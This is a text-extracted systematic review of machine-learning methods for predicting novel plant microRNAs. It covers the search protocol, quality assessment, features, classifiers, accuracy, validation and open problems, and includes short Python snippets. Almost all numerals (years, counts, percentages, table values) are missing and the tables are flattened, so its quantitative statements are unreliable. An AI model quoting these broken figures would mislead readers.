between – , the intergovernmental panel on climate change (ipcc) reports with high confidence that global temperature increases of . degrees is likely to become a reality if current rates of temperature changes are maintained (hoegh guldberg et al., ). although this will result in smaller net reductions for maize, rice, wheat and potentially other cereal crops than would be observed with a degree rise, the risk to global food security and economics is not to be overlooked, especially regarding staple crops such as wheat, that are required to increase in production levels to meet projected increases in global demands (liu et al., ; ray et al., ; hoegh guldberg et al., ; challinor et al., ). mirnas are known to be involved in several important stress-response pathways including drought, heat and salinity. for example, in the model plant arabidopsis thaliana, upregulation of mir is critical for thermotolerance (guan et al., ), downregulation of mir is observed in drought-tolerant varieties and overexpression of osa-mir c inferred increased salt and alkali tolerance (gao et al., ). however, it has become clear that plant species show remarkable variety in the relationship between mirnas and their role in stress tolerance. for example, osa-mir c in rice (oryza sativa) showed the same response as a. thaliana in increased salinity and alkaline environments (gao et al., ). however, for other mirnas such as mir the relationship between their expression and drought tolerance appears to vary between species. in a. thaliana and the model legume medicago truncatula, mir is down-regulated in response to drought (li et al., ; trindade et al., ; sunkar, li & jagadeeswaran, ). contrastingly, in rice and tomato (solanum lycopersicum cv. ailsa craig), drought stress led to the up-regulation of mir- (zhao et al., ; zhang et al., ). additionally (zhou et al., ) identified a further mirnas that showed opposite expression patterns in a.thaliana in response to drought stress. the observed interspecies variation in mirna activity in response to stressful stimuli demonstrates that there is a need for the discovery and functional characterization of mirnas for each species of plant of interest. thanks to advancements in next-generation sequencing (ngs) technology and interdisciplinary collaborations, the rapid identification of species-specific plant mirnas and their expressions in response to stimuli is now possible (liu et al., ; unamba, nag & sharma, ; hu, lan & miller, ). ngs is both high throughput and highly manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. accurate, facilitating the identification of sequence variations and novel mirnas (hu, lan & miller, ). however, many computational methods such as those described in (evers et al., ; an et al., ; hackenberg, rodriguez-ezpeleta & aransay, ) only allow for homology-based identification of mirnas. this means the tools are not able to take full advantage of the available information in the sequencing data, such as novel mirna identification. as such, numerous ab initio methods have been developed to facilitate the discovery of novel mirnas. however, caution is being urged when interpreting the results of such computational inferences of biological data (taylor et al., ; taylor et al., ). 
the generation of computational tools to identify mirna sequences requires biological assumptions to underpin the methods and, as with all new areas of research, these assumptions change with new evidence over time (ambros et al., ; meyers et al., ; axtell & meyers, ). this systematic review surveys the computational methods that facilitate the ab initio identification of plant mirnas over the last decade ( – ). it seeks answers to five research questions that aim to elucidate the developments, reliability and validity of the methods used, and considers potential opportunities for future developments in the computational identification of mirnas. methodology this systematic review focuses on the literature that was published between and . this time range was considered to collect and analyze the recent methodologies developed on ab initio plant mirna identification. the following sections contain the steps of the review protocol: research questions, search strategy, selection criteria, data extraction and quality assessment. research questions this review is intended to answer the following research questions: (q ) how many methods were developed during the past decade? (q ) what kind of machine learning algorithms and features were used? which models/features performed well? (q ) how accurate and reliable are the developed models? (q ) what kind of computational and/or experimental validation methods were used? how appropriate are those validation methods? (q ) what are knowledge gaps, open problems and/or opportunities? search strategy the search strategy was used to identify plant mirna prediction methods developed between and in databases of ieee xplore (https://ieeexplore.ieee.org/xplore/ home.jsp), science direct (https://www.sciencedirect.com/), pubmed (https://www.ncbi. nlm.nih.gov/pubmed?otool=msubolib), web of science (http://www.webofknowledge. com/) and google scholar (https://scholar.google.com/). the following terms were used for the literature searches: ‘‘novel mirna identification in plants’’ (including variations of the word ‘‘identification’’ such as ‘‘prediction’’ and ‘‘discovery’’) and ‘‘computational method’’. they were used as queries as shown below. manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://ieeexplore.ieee.org/xplore/home.jsp https://ieeexplore.ieee.org/xplore/home.jsp https://www.sciencedirect.com/ https://www.ncbi.nlm.nih.gov/pubmed?otool=msubolib https://www.ncbi.nlm.nih.gov/pubmed?otool=msubolib http://www.webofknowledge.com/ http://www.webofknowledge.com/ https://scholar.google.com/ http://dx.doi.org/ . /peerj-cs. table article selection criteria. inclusion criteria exclusion criteria studies that use machine learning algorithms studies that only use sequence homology studies that solely use plants or include plant data studies that use animal or unspecified species datasets published journal articles or conference proceedings literature reviews/surveys on the subject and unpublished articles (novel mirna identification in plants) and (computational method) these search terms were utilized to narrow down the large number of mostly-irrelevant retrieved articles from databases such as science direct and google scholar, into mostly relevant articles. selection criteria the selection criteria used for the review is shown in table . the review process began with a study search procedure. from the initial search results to the final list of primary studies, the procedure was performed as follows. . 
the article search was carried out using the aforementioned search strategy mentioned above. a total of , search results were found from all of the databases. that is considering only search results from google scholar as it gave over , results per search term. in order to narrow-down from , google scholar results, we restricted the output to the first ten pages of the search. this resulted in articles that are most relevant to the query. • ieee xplore: • science direct: • pubmed: • web of science: • google scholar: . out of the search results from the databases, articles were first filtered by assessing the title’s relevance. if deemed relevant to the subject, it was included in the initial list. . secondly, the abstracts were assessed for relevance. this resulted in articles. . finally, the selection criteria (see table ) were applied on the remaining articles and articles were retained as the final list (referred to as the primary list). data extraction table outlines the criteria used for data extraction from the primary studies. data and general information from each article were extracted to enable the five research questions to be addressed (see research questions). quality assessment the study quality assessment was performed on all primary studies and was based on six questions as detailed: manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table data extraction form. search focus data item description article details title, authors, published year and publication venue article type journal article or conference proceedingsgeneral study description introduction of the study q data plant data only methods and methods including plant data datasets dataset source, positive and negative example datasets, and species features types of features used machine learning algorithms type of machine learning algorithm used for classification q feature selection methods used to select/extract features for the model q performance metrics accuracy values and other performance measurements q validation methods cross-validation and experimental validation methods q future work suggested future work in conclusion section and other aspects that are not being addressed (qa ) are all the considered data being used for the model (without sample selection)? a ‘‘sample’’ refers to a single mirna sequence considered for the experiments. in machine learning, they are also referred to as an example or an instance of data. (qa ) do they mention any information about the negative dataset used? a typical machine learning model require positive and negative examples, which are sequences labeled as mirnas or none-mirnas, respectively. this question refers to any information about the negative dataset such as what kind of sequences were considered as negatives and how many examples were considered. (qa ) are there any feature selection methods considered in each method? rather than using all the features gathered, did the study use a feature selection method to select a subset of most effective features for model development. (qa ) do they conduct any experimental validation of their findings? did the study use validation methods to experimentally validate the findings (mirna predictions) output from their machine learning models. (qa ) are the results of the performance evaluation quantified? did the study present their results using a typical performance measure such as accuracy used in machine learning. 
(qa ) is the study focused only on plant mirna identification? did the study solely use plant mirna sequences for developing the prediction model or have they considered a mixture of plant and animal mirnas. results figure is the flow diagram depicting the study selection process with the numbers described in the methodology (liberati et al., ). table illustrates the results of the quality assessment process. none of the articles answered ‘‘yes’’ to all the six questions. zou et al. ( ) does not satisfy any quality manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure prisma flow diagram (liberati et al., ). full-size doi: . /peerjcs. /fig- assessment category, but it is still considered for the systematic review in order to analyze their methodology. tables and shows the information collected from the primary studies during the data extraction process. table s shows the publication venues of the primary articles. according to the table, bmc bioinformatics journal has the most number of articles selected. the answers to all the research questions are being presented below based on the primary studies selected. (q ) how many methods were developed during the past decade? the primary list of articles consisted of studies which were focused on the problem of novel plant mirna identification. of these, studies were focused solely on plant mirna identification. the remaining studies focused on both plant and animal mirna identification, with plant datasets either used to train the machine learning models or used only to test the model (after training with non-plant datasets). the plant-focused studies used datasets from several different species. meng et al. ( ) considered all the plant datasets available in mirbase (a mirna database) by (kozomara & griffiths-jones, ). breakfield et al., ; silla, de o camargo-brunetto & binneck, and sunkar et al., , each worked on one specific plant species (arabidopsis, soybean manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. table quality assessment results. reference qa qa qa qa qa qa tseng et al. ( ) no yes yes yes yes yes yousef et al. ( ) yes yes yes no yes yes yousef, allmer & khalifa ( ) yes yes yes no yes yes breakfield et al. ( ) no yes no yes yes yes douglass et al. ( ) no yes no yes yes yes sunkar et al. ( ) no yes yes yes no yes abu-halaweh & harrison ( ) yes yes yes no yes no guan et al. ( ) yes yes yes no yes no meng et al. ( ) no yes yes no yes yes williams, eyles & weiller ( ) no yes yes no yes yes xuan et al. ( ) no yes yes no yes yes yao et al. ( ) yes yes no no yes yes koh & kim ( ) yes yes no no yes no silla, de o camargo-brunetto & binneck ( ) no yes no no yes yes wu et al. ( ) no yes yes no yes no zhong et al. ( ) yes yes no no yes no kadri, hinman & benos ( ) no yes no no yes no vitsios et al. ( ) yes no no no yes no xiao et al. ( ) no yes no no yes no zou et al. ( ) no no no no no no and rice respectively). therefore, they used only that plant species or included a few additional species to the dataset. as there is not an abundance of species-specific mirna data available, most studies used a combination of plant species data. the primary list contains nine studies that used both plant and animal datasets. these studies used the same features for both kingdoms mirna identification. this might be due to the lack of data in plants. 
therefore, researchers tend to combine animal datasets in order to get a larger dataset, and they consider the same features. this results in a number of tools that are for both animals and plants that do not consider the differences between their mirnas. figure shows the distribution of article publication on the subject in the past decade. most plant only publications occurred in and , no publication was published on novel plant mirna identification. figure shows the distribution of specific plant species used in the primary studies. all the studies used both positive and negative datasets in their methods. whilst plant mirna data was used for the positive set, a range of data was used for the negative set, ensuring they were free of real mirna sequences. nine studies used protein coding regions to collect pseudo mirnas for their negative dataset. as almost all reported mirnas are found in the non-coding regions of the genome, these sequences are assumed as pseudo mirna data (xuan et al., ). guan et al. ( ), koh & kim ( ), xiao et al. ( ), yousef, allmer & khalifa ( ) and yousef et al. ( ) used the negative datasets from manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table data extraction results. primary study article type data dataset source number of species used negative datasets feature selection methods xuan et al. ( ) j p mirbase , phyto- zome database protein coding re- gion of a.thaliana and g.max genomes considering informa- tion gain and feature redundancy yousef et al. ( ) j p mirbase , in brassicaceae and training data from xuan et al. ( ) samples from xuan et al. ( ) using svm-rfe (re- cursive feature elimina- tion) implemented in weka, selected top ranked features. silla, de o camargo-brunetto & binneck ( ) c p plant microrna database, deepbase, phytozome glycine max, athaliana, med- icago truncatula arabidopsis thaliana snorna sequences from deepbase and rna sequences randomly generated n/a meng et al. ( ) j p mirbase from coding regions of species using back svm-rfe, / features were selected breakfield et al. ( ) j p mirbase , ncbi se- quence read archive arabidopsis from intergenic or in- tronic genomic loca- tions n/a douglass et al. ( ) j p mirbase , gene ex- pression omnibus (geo) smrna sequences re- maining after known mirna filtering n/a yao et al. ( ) j p mirbase , ensem- blplants database v from coding region of species selected subsets of fea- tures (based on types of features) to check the impact of those fea- tures tseng et al. ( ) j p mirbase , gene ex- pression omnibus, tair, rgap arabidopsis and rice tested with different combinations of fea- tures (based on type) williams, eyles & weiller ( ) j p mirbase , tigr plant transcript as- semblies from expressed se- quence tags (est) of species n/a sunkar et al. ( ) j p mirbase , tigr rice genome annotation database rice rice coding sequences from tigr wrapper-based method. using weights from svm (continued on next page) m anuw eera etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) primary study article type data dataset source number of species used negative datasets feature selection methods yousef, allmer & khalifa ( ) j p mirbase , from xuan et al. ( ) using svm-rfe (re- cursive feature elemi- nation) implemented in weka, selected top ranked features. xiao et al. 
( ) j eval: p+v mirbase all mirbase from previous work (human data) n/a koh & kim ( ) j a+p mirbase mirbase excluding virus pseudo hairpins form micropred n/a wu et al. ( ) j a+p mirbase all mirbase random start sequences; identical to real mirna but start position is shifted by nt tested for the high- est raninking features zou et al. ( ) j a+p mirbase all mirbase tested on different fea- ture sets zhong et al. ( ) j a+p previous studies (mir- base , , ) from previous studies previous methods n/a guan et al. ( ) j a+p mirbase from protien coding regions (from previous studies) n/a vitsios et al. ( ) j a+p mirbase n/a abu-halaweh & harrison ( ) c a+p previous work (rfam etc.) human coding regions fdt integrates two measures, classifica- tion ambiguity and fuzzy information gain to identify the set of the most significant features kadri, hinman & benos ( ) j test set: p microrna registry v . , ucsc genome browser coding regions and random genomic seg- ments from genome obtained by ucsc genome browser n/a notes. j, journal; c, conference proceeding; p, plant; a, animal; v, virus; n/a, feature selection not used. m anuw eera etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table data extraction results ( ). primary study input types of features types of ml models predicted output key results experimental validation sequence structural thermodynamic/ stability other discriminative probabilistic p re ci si on r ec al l f -s co re sp ec if ic it y g eo m et ri c m ea n a cc u ra cy a u c xuan et al. ( ) pre-mirna triplet svm - rbf kernel pre-mirna . . . . yousef et al. ( ) pre-mirna existing; motif features existing existing svm - rbf kernel pre-mirna . . . silla, de o camargo-brunetto & binneck ( ) pre-mirna svm - rbf kernel pre-mirna meng et al. ( ) pre-mirna and mature mirna svm pre-mirna and mature mirna . . . . breakfield et al. ( ) small rna including all types naïve baye’s mature mirna vs nc- rna . . rt-pcr etc. douglass et al. ( ) small rna naïve baye’s mature mirna . rt-pcr yao et al. ( ) pre-mirna including all types svm - rbf kernel pre-mirna . . . . , tseng et al. ( ) small rna svm mature mirna . . . . rt-pcr williams, eyles & weiller ( ) mature mirna decision tree mature mirna . . sunkar et al. ( ) small rna to -mer seq. motifs svm - linear mature mirna northern analysis yousef, allmer & khalifa ( ) pre-mirna n-grams, motifs svm and k-means mature mirna . xiao et al. ( ) pre-mirna network features of stem-loop random forest pre-mirna . . . . koh & kim ( ) pre-mirna svm - rbf kernal pre-mirna . wu et al. ( ) pri-mirna , , mature, pre, pri-mirna , , mature, pre, pri-mirna , , mature, pre, pri-mirna other features svm mature mirna regions zou et al. ( ) mature mirna , triplet random forest mature mirna and their family zhong et al. ( ) pre-mirna svm pre-mirna . . . guan et al. ( ) pre-mirna misc. covering all types adaboost pre-mirna and mature mirna . . . vitsios et al. ( ) mature mirna covering all types random forest mature mirna . - . abu-halaweh & harrison ( ) pre-mirna including all types fuzzy decision tree pre-mirna . . . kadri, hinman & benos ( ) pre-mirna parameters hierarchical hmm pre-mirna notes. f score, *(precision*recall)/(precision+recall); geometric mean, sensitivity*specificity. m anuw eera etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure distribution of publications in the past decade. . full-size doi: . /peerjcs. 
/fig- figure plant species used (even though arabidopsis belongs to the brassicaceae family, it has been used in significant amount of work as it is a model plant; therefore, it has been added to the figure sepa- rate from brassicaceae). full-size doi: . /peerjcs. /fig- manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. previous studies which were already available. yousef, allmer & khalifa ( ) discusses a one-class classifier for plant mirnas where they only used the positive data set. however, for the comparison with a binary classifier, they needed a negative dataset. the remaining studies either randomly generated negative datasets or used other non-coding rnas such as small nucleolar rna (snorna), transfer rna (trna) etc. (q ) what kind of machine learning algorithms and features were used? which model- s/features performed well? many of the studies used the same or similar sets of features consisting of sequence-based, structural and thermodynamic features. the studies use either the same set of features from previous studies or extend them by adding new features to enhance performance. the sequence-based features often consist of nucleotide/di-nucleotide frequencies, motifs, n-grams, gc content and sequence length among others. the structural features primarily consist of features as described in xue et al. ( ) and also minimum free energy (mfe) measures. thermodynamic features include the structure entropy and enthalpy measures. the vast majority of studies utilize a combination of various structural and sequence-based features which may aid in increasing the chances of identifying a correct mirna, despite their diversity within the plant kingdom. williams, eyles & weiller ( ) and kadri, hinman & benos ( ) have used sliding windows of size ranging – nt (known plant pre-mirna are below nt according to williams, eyles & weiller ( ) and for kadri, hinman & benos ( ), most of the pre-mirna were covered when the window size is nt) to scan genome sequences for folding into hairpin structures and then collect structural features. therefore, this range can be used for scanning the whole genome of a specific plant spices. plant precursor sequences have varying sizes of secondary structures but there is no unified technique reported for dealing with the issue. williams, eyles & weiller ( ) select the size of the majority of pre-mirna in mirbase (< nt). kadri, hinman & benos ( ) use nt minimum for selecting/ filtering pre-mirnas. xuan et al. ( ) considered different ranges of lengths to get the majority of sequence information. wu et al. ( ) used nt as the length of pre-mirna. according to meng et al. ( ), plant pre-mirna can range from – nt. therefore, many of the studies have used a window size that is being guided by this length range to select the set of pre-mirna for their studies. apart from those features, xiao et al. ( ) focused on other methods to achieve structural features using network parameters. a few remaining studies haven’t described the feature set with adequate information. but most of the studies tend to follow the same set of features which were proven to be effective through previous studies. figure shows the distribution of types of features used in the primary studies. different studies have been conducted to show the impact of different sets of features. 
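to make these feature families concrete before comparing them, the following is a minimal sketch of the sequence-based features that recur across the surveyed methods (mono- and di-nucleotide frequencies, gc content and length); structural and thermodynamic features such as minimum free energy would come from an external rna-folding tool and are not computed here. the function name and feature keys are illustrative, not taken from any particular study.

```python
from itertools import product

def sequence_features(seq):
    """Simple sequence-based features for a candidate pre-miRNA sequence."""
    seq = seq.upper().replace("T", "U")
    n = len(seq)
    feats = {
        "length": n,
        "gc_content": (seq.count("G") + seq.count("C")) / n,
    }
    for base in "ACGU":                                   # mono-nucleotide frequencies
        feats[f"freq_{base}"] = seq.count(base) / n
    for a, b in product("ACGU", repeat=2):                # di-nucleotide frequencies
        d = a + b
        feats[f"freq_{d}"] = sum(seq[i:i + 2] == d for i in range(n - 1)) / max(n - 1, 1)
    return feats

# e.g. sequence_features("UGAGGUAGUAGGUUGUAUAGUU")
```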
some methods show that thermodynamic features (yao et al., ) are better while another reports that sequential features (yousef et al., ) are better. however, there is no concrete answer or common theme since there aren’t many studies comparing different feature types for plant mirna prediction. whilst most studies utilized features extracted from data generated from various plant species, a few did use features extracted from non-plant species and then used this data manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure types of features used. full-size doi: . /peerjcs. /fig- to test their models’ performance on other species. both guan et al. ( ) and kadri, hinman & benos ( ) used human mirna data to train their models and then tested model performance on several plant species including the model plant species arabidopsis thaliana as well as oryza sativa. both methods performed well on these species, with (kadri, hinman & benos, ) achieving . % and . % of correctly predicted mirna for a.thaliana and o.sativa respectively. guan et al. ( ) was able to achieve . % accuracy for a.thaliana and . % for o.sativa as well an impressive % accuracy for chlamydomonas reinhardtii. similarly, (vitsios et al., ) demonstrated an accuracy of between . % and . % for the identification of plant mirnas using a model trained on animals. xiao et al. ( ) was also able to achieve similar results in the detection of mirna precursors trained on animal data, demonstrating an accuracy of . % for plant data. the success of these studies indicates that plant and animal mirnas do share some conserved sequence and structural characteristics. the studies considered in this review all used machine learning algorithms to identify novel mirnas in plant species. the selected primary studies used the following machine learning algorithms in their methods. • support vector machine (svm) (kecman, ) • random forest (breiman, ) • naive bayes (runkler, ) • decision tree (swain & hauska, ) • hierarchical hidden markov model (hhmm) (fine, singer & tishby, ) manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure machine learning algorithms used. full-size doi: . /peerjcs. /fig- • adaboost (freund & schapire, ) out of the above algorithms, studies used svm for their model. in general, models using svms have provided good overall performances in mirna identification. three other studies used random forest algorithm. the machine learning algorithms used are limited to the above list in the past decade. figure shows the distribution of machine leaning algorithms used in the past decade on identifying novel mirnas in plants. the inputs to these machine learning models consist of either pre-mirna, mature mirna or small rna sequences. meng et al. ( ) used both pre-mirna and mature mirna as the inputs to develop an integrated model for both mirna and pre-mirna prediction. methods such as (tseng et al., ; douglass et al., ; breakfield et al., ) used small-rna sequencing data for their models. these methods still output the predicted mirnas. (q ) how accurate and reliable are the developed models? considering the overall results reported by the authors, almost all the methods performed well in identifying novel plant mirnas –many of them achieved very good accuracy values. 
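for context on the figures discussed next, the dominant pipeline across these studies can be sketched as an rbf-kernel svm over precomputed feature vectors, scored with k-fold cross-validation; the feature matrix, labels, hyperparameters and fold count below are placeholders rather than any single study's setup.

```python
import numpy as np
from sklearn.svm import SVC
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import accuracy_score, recall_score

def evaluate_rbf_svm(X, y, n_splits=5):
    """k-fold cross-validated accuracy, sensitivity and specificity."""
    accs, sens, spec = [], [], []
    cv = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=0)
    for train, test in cv.split(X, y):
        clf = SVC(kernel="rbf", C=1.0, gamma="scale").fit(X[train], y[train])
        pred = clf.predict(X[test])
        accs.append(accuracy_score(y[test], pred))
        sens.append(recall_score(y[test], pred, pos_label=1))   # recall on real miRNAs
        spec.append(recall_score(y[test], pred, pos_label=0))   # recall on negatives
    return np.mean(accs), np.mean(sens), np.mean(spec)
```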
most of the studies used accuracy, recall, sensitivity and specificity to illustrate the performance of the model. eleven studies used accuracy as a performance measure and of those studies achieved accuracies above %. even though the reported performances are not directly comparable, the highest accuracy of . % was reported by yousef et al. ( ). considering the results presented by each study, all of them performed well and are therefore seemingly reliable. all of the plant-only methods perform well, with accuracy values above %. these performance values are based on the specific plant species considered and may not hold for other species. also, there is potential for improving the performances by considering feature selection and advanced machine learning techniques. note that the analysis presented here is only based on the performances reported by the authors. while it may look like many models are performing very well, with performance values above %, we would like to highlight the fact that more than % of the models are developed and tested on plant species with relatively less complex genomes, such as a. thaliana (see fig. ). therefore, we raise the concern that these models may not work for more complex plant genomes such as wheat. with the recent sequencing of the whole wheat genome, identifying novel mirnas and their functions is of utmost importance, but none of the existing methods reviewed in this survey focuses on complex plant species. the lack of high-quality plant data in popular knowledgebases such as mirbase (kozomara, birgaoanu & griffiths-jones, ), which leads to a lack of adequate training data, may be hindering the bioinformatics community from developing plant-based models for complex plant genomes.
(q ) what kind of computational and/or experimental validation methods were used? how appropriate are those validation methods?
except for two studies, all the other studies used a cross-validation technique for evaluating their machine learning models. five-fold cross-validation was used by eight studies while six studies used -fold cross-validation. using cross-validation is helpful in the performance evaluation of the developed models. experimental validation of putative novel mirnas is an important part of mirna prediction. of the studies evaluated in this systematic review, only four (tseng et al., ; breakfield et al., ; douglass et al., ; sunkar et al., ) experimentally validated the presence of the novel mirnas predicted by their machine learning methods. the most popular method was stem-loop pcr, employed by tseng et al. ( ), breakfield et al. ( ) and douglass et al. ( ). tseng et al. ( ) additionally utilized qpcr, and sunkar et al. ( ) employed northern blot analysis and small rna blots. tseng et al. ( ) confirmed out of predicted mirnas to be real mirnas, while sunkar et al. ( ) tested and confirmed seven out of predicted mirnas. breakfield et al. ( ) and douglass et al. ( ) experimentally validated of their predictions each to be true mirnas.
(q ) what are knowledge gaps, open problems and/or opportunities?
computational mirna identification is still a relatively young branch of biology and, as such, it contains many knowledge gaps, open problems and opportunities. however, one of the most pressing is the need for the biological validation of computationally predicted mirnas.
it has become clear from studies conducted by axtell & meyers ( ), taylor et al. ( ) and taylor et al. ( ) that many of the mirna sequences deposited in databases such as mirbase (kozomara & griffiths-jones, ) are biologically implausible. taylor et al. ( ) labeled one-third of all annotated plant mirna loci and % of all plant mirna families as questionable in mirbase release (kozomara & griffiths-jones, ). similarly, axtell & meyers ( ) found that only . % of land plant mirna loci and . % of land plant families are labeled as high confidence in mirbase version (kozomara & griffiths-jones, ). whilst there are many factors responsible for these observations, one of the causes may simply be developments in the understanding of mirna biology. the last ten years have seen the release of two guidelines for the identification of plant mirnas, one of which was released in and the other in (meyers et al., ; axtell & meyers, ). prior to these releases, the first mirna identification guide was produced in (ambros et al., ). as all computational identification methods are based upon biological assumptions, it stands to reason that the use of tools that are based on inaccurate or out-of-date assumptions will yield biologically questionable results. whilst this unmistakably calls for researchers to thoroughly inspect the methods of their chosen tools to discern the assumptions upon which they are based, this is not always a straightforward task. most of the tools in this study made no reference to a specific guideline that was followed, which is of course not a necessity and in some cases would be inappropriate. the sources used may indeed be in accordance with the most recent guidelines, or they may be expanding upon those guidelines, as performed in yousef, allmer & khalifa ( ), who investigated motif-based features for ab initio plant mirna detection. additionally, if there have been developments in the understanding of mirna biology that have superseded the information in the guidelines, it would, of course, make little sense to blindly abide by the guidelines. an additional complication is a lack of clarity in the methods. these tools are both biologically and computationally complex, and understanding the methods that underlie them may not be a straightforward task for experts of various domains. there is a need to ensure that the methods of such tools are written in such a way as to make clear the underlying assumptions. failure to do so could lead to a tool being inappropriately selected, disregarded or improperly used. in some cases, this will require the user of such tools to read the preceding studies that have been referenced in place of the method specifics. another cause of the questionable mirna annotations that are deposited in databases is the unquestioning use of the databases themselves (taylor et al., ). as discussed previously, many of the annotations within databases such as mirbase are questionable at best and at worst incorrect (taylor et al., ; taylor et al., ; axtell & meyers, ). as such, an additional opportunity for improvement presents itself to both computer scientists and biologists: the selection of high-confidence mirnas to be used as benchmarks. of the papers discussed here, all used either mirbase or its precursor, the microrna registry database, of which seven used mirbase version or .
of these papers (yao et al., ; yousef, allmer & khalifa, ; yousef et al., ; vitsios et al., ; douglass et al., ; tseng et al., ; koh & kim, ), only douglass et al. ( ) make reference to the confidence of the sequences used. whilst they do not explicitly say they used "high confidence" sequences, they specify that they required either one or two types of experimental evidence, dependent upon species and available evidence (douglass et al., ). the addition of a "high confidence" tag was made available shortly after the release of mirbase version , and it allows users to "vote" on whether they agree with the "high confidence" tag or not (kozomara & griffiths-jones, ). for studies that used mirbase prior to version , the use of experimentally validated mirnas shows that the mirna sequences used were of high confidence. however, only meng et al. ( ), wu et al. ( ) and douglass et al. ( ) specify the use of experimentally validated sequences. utilizing only high-confidence mirnas will increase the manual work required to obtain data from databases and will likely significantly decrease the number of available sequences, which may reduce statistical power. however, it may be a necessity to reduce the rate at which false-positive mirnas are being deposited into databases. whilst it may be outdated due to further mirbase updates, taylor et al. ( ) provide a link to a library of valid plant mirnas in fasta format, which can be utilized and/or built upon as a benchmark for future plant mirnaomes. another important factor in the influx of incorrect annotations is the unquestioning inclusion of all bioinformatically predicted mirnas (taylor et al., ). it is very likely that computational prediction programs will produce false positives, and the only way to avoid the inclusion of these incorrect annotations is the manual inspection of each positively identified mirna against the most recent set of guidelines, such as those written by axtell & meyers ( ) and taylor et al. ( ). whilst this process will massively increase the manual requirements for mirna identification, it will go some way in preventing the continuous influx of incorrectly annotated sequences into public databases (taylor et al., ). however, the best form of verification of the biological presence of a mirna is experimental validation. of the papers discussed in this review, only four (tseng et al., ; douglass et al., ; sunkar et al., ; breakfield et al., ) incorporated some form of experimental validation. of these, only two studies were based only upon the development of a mirna prediction model or classifier (tseng et al., ; douglass et al., ). both of these studies utilized small rna-seq data, which may still yield false positive mirna predictions, and indeed this is demonstrated by the experimental validation of predictions that used small rna-seq data. for example, tseng et al. ( ) experimentally confirmed the presence of only out of predicted novel mirnas within two biological replicates, and douglass et al. ( ) was able to validate only two out of high-scoring putative mirnas using their stringent criteria. whilst it is likely that experimental validation will yield some level of false negative results, it may still be a necessity if progress is to be made towards mapping the genuine mirnaome of a given species.
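one practical step raised above, restricting a benchmark to high-confidence mirbase entries for plant species of interest, can be sketched as follows. the file name and the species prefixes are assumptions for illustration only: mirbase distributes hairpin sequences in fasta form and, in recent releases, a high-confidence subset, but the exact file used here is hypothetical and the prefix list is not exhaustive.

```python
def read_fasta(path):
    """Minimal FASTA reader: yields (header, sequence) pairs."""
    header, chunks = None, []
    with open(path) as fh:
        for line in fh:
            line = line.strip()
            if line.startswith(">"):
                if header is not None:
                    yield header, "".join(chunks)
                header, chunks = line[1:], []
            elif line:
                chunks.append(line)
        if header is not None:
            yield header, "".join(chunks)

def plant_subset(records, species_prefixes=("ath", "osa", "zma", "tae")):
    """Keep entries whose ID starts with one of the given species prefixes
    (e.g., 'ath' for Arabidopsis thaliana); the prefix list is illustrative."""
    for header, seq in records:
        if header.split()[0].split("-")[0] in species_prefixes:
            yield header, seq

# assumed (hypothetical) file name: a high-confidence hairpin set downloaded from miRBase
benchmark = list(plant_subset(read_fasta("high_conf_hairpin.fa")))
print(len(benchmark), "plant high-confidence hairpins retained")
```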
due to the rising concern over poor mirna annotations in databases, it is likely that many changes will be made by both database curators and researchers. for example, axtell & meyers ( ) recommend that all mirnas identified through a homology-based approach only should be labeled as "putative". in addition, the authors of mirbase (kozomara & griffiths-jones, ) are aiming to incorporate a tiered confidence structure for mirna entries as well as a text-mining based approach to categorize mirna-related articles and extract the biological meanings from the text. these changes may result in alterations of mirna annotations and, as such, it may benefit biologists to utilize the mirbase change log function available from mirbase or tools such as the mirbase tracker (van peer et al., ; kozomara & griffiths-jones, ). the use of these tools will aid biologists in understanding the annotation history of a given mirna and, perhaps, in the future provide information regarding changes in supporting evidence. issues related to machine learning and feature selection methods also exist in this field. different groups have used various techniques for selecting negative data without having performed a comprehensive study on the most appropriate technique. but since the quality of the negative data heavily impacts machine learning models, this should be directly addressed. also, as mentioned before, many authors use features proven to be most effective for animals on models developed for plants without comprehensive evaluation. this likely impacts the performance due to the noticeable differences between plant and animal mirna sequences (yao et al., ; douglass et al., ). on top of this, some models have not considered feature selection at all (silla, de o camargo-brunetto & binneck, ; williams, eyles & weiller, ; xiao et al., ; etc.). as mentioned above, most of the methods have not conducted experimental validation of the novel mirnas predicted by the computational models. in fact, only methods have validated their findings (breakfield et al., ; douglass et al., ; tseng et al., ; sunkar et al., ). machine learning methods are not perfect; it is important to confirm whether the predictions of the model are accurate in order to claim the finding of novel mirnas. also, the use of feature selection methods would be beneficial rather than using all available features for the model, but only some of the methods have used feature selection techniques. considering the differences between plant and animal mirna sequences, focusing on features specific to plants (instead of using the features that were found to work well for animal mirnas), and identifying features effective for more complex genomes such as wheat and barley, would be essential. use of other sophisticated machine learning algorithms would be beneficial in enhancing the performance of the tools. apart from the machine learning algorithms mentioned in the primary studies, other opportunities are available with advanced models such as neural networks (abe, ) and deep learning (lecun, bengio & hinton, ). however, there needs to be a large dataset in order to use deep learning models and, given the sparsity of experimentally validated sequences, this may not be an appropriate route at this time. as such, semi-supervised models that learn from both labeled and 